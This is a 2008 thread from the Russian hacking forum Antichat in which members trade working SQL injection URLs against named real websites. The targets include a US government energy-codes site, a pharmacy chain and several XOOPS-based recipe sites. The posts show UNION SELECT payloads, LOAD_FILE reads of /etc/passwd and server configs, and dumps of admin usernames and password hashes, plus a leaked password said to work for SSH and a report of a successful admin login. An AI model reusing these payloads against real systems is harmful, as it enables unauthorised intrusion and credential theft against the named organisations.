ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5151  
Старый 21.03.2008, 16:45
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

А вот и .GOV

_http://www.energycodes.gov/implement/state_codes/state_status.php?state_AB=P'+union+select+1,2,3,4, AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),ver sion(),char(58),database()),0x71),0x71),6,7,8,9,0, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37/*

stateinfo_read@ecodesvr.pnl.gov:5.0.18-log:stateinfo

фильтрация from, но кому надо обойдёт
 
Ответить с цитированием

  #5152  
Старый 21.03.2008, 17:26
Аватар для 1nf3ct0r
1nf3ct0r
Новичок
Регистрация: 15.08.2007
Сообщений: 11
Провел на форуме:
37182

Репутация: 3
По умолчанию

http://www.hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+null,null,null,concat(user,0x3a, password,0x3a,host),null,null,7,null+from+mysql.us er

пароль вроде был 'yf[eq', сейчас не знаю.. раньше пасс и подходил для ssh
 
Ответить с цитированием

  #5153  
Старый 21.03.2008, 18:20
Аватар для goror
goror
Новичок
Регистрация: 19.03.2008
Сообщений: 6
Провел на форуме:
30775

Репутация: 1
По умолчанию

Цитата:
Сообщение от jokester  
А вот и .GOV

_http://www.energycodes.gov/implement/state_codes/state_status.php?state_AB=P'+union+select+1,2,3,4, AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),ver sion(),char(58),database()),0x71),0x71),6,7,8,9,0, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37/*

stateinfo_read@ecodesvr.pnl.gov:5.0.18-log:stateinfo

фильтрация from, но кому надо обойдёт
Если не секрет, как фильтрацию from обойти?
Прочитал кучу мануалов, не нашел.
 
Ответить с цитированием

  #5154  
Старый 21.03.2008, 21:54
Аватар для Sharingan
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

Код:
http://www.canurb.com/events/event_details.php?id=-105+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/*
5.0.45-community:canurb@localhost:canurb_cui
есть таблицы типа админ, юзер, но че то с ними не получилось =(
 
Ответить с цитированием

  #5155  
Старый 22.03.2008, 14:41
Аватар для mr.The
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию

hxxp://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10/*

5.0.19-standard
root@localhost

кто найдёт раскрытие путей скажите.
ЗЫ. из базы ничего толкового невытащил. кроме како-го то паса "123456" в md5. логин ненашол. админки или чего-то подобного тоже.
 
Ответить с цитированием

  #5156  
Старый 22.03.2008, 15:02
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от mr.The  
кто найдёт раскрытие путей скажите.
Пути можешь сдесь посмотреть

_http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/httpd/conf/httpd.conf'),4,5,6,7,8,9,10/*
 
Ответить с цитированием

  #5157  
Старый 22.03.2008, 15:52
Аватар для Spaise
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208

Репутация: 21
По умолчанию

todobulla.cl
Цитата:
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),3/*
web7_u1@localhost:5.0.32-Debian_7etch1-log:web7_db1

Названия таблиц -
Цитата:
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,2,table_name+from+information_ schema.tables/*
Названия столбцов -
Цитата:
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,2,column_name+from+information _schema.columns/*
 
Ответить с цитированием

  #5158  
Старый 22.03.2008, 22:11
Аватар для samarin
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Только учусь!
Сеть аптечных магазинов!
Цитата:
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576
5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables
Цитата:
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576
админка
Цитата:
http://zdorovie-plus.com/adm/login.php
------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях

Последний раз редактировалось samarin; 22.03.2008 в 22:46..
 
Ответить с цитированием

  #5159  
Старый 22.03.2008, 23:34
Аватар для CaNNabi$
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

Код:
http://www.budgiemania.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://www.tieltown.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://www.parrotrecipes.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://lawyerintl.com/modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
Отвечаю мне так впадлу оформлять
 
Ответить с цитированием

  #5160  
Старый 23.03.2008, 00:27
Аватар для Muhacir
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

Цитата:
Сообщение от samarin  
Только учусь!
Сеть аптечных магазинов!

5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables

админка

------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,usr,3,pwd,5+from+zd p_usr/*
user: *****
pass: *****
+ заходит.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ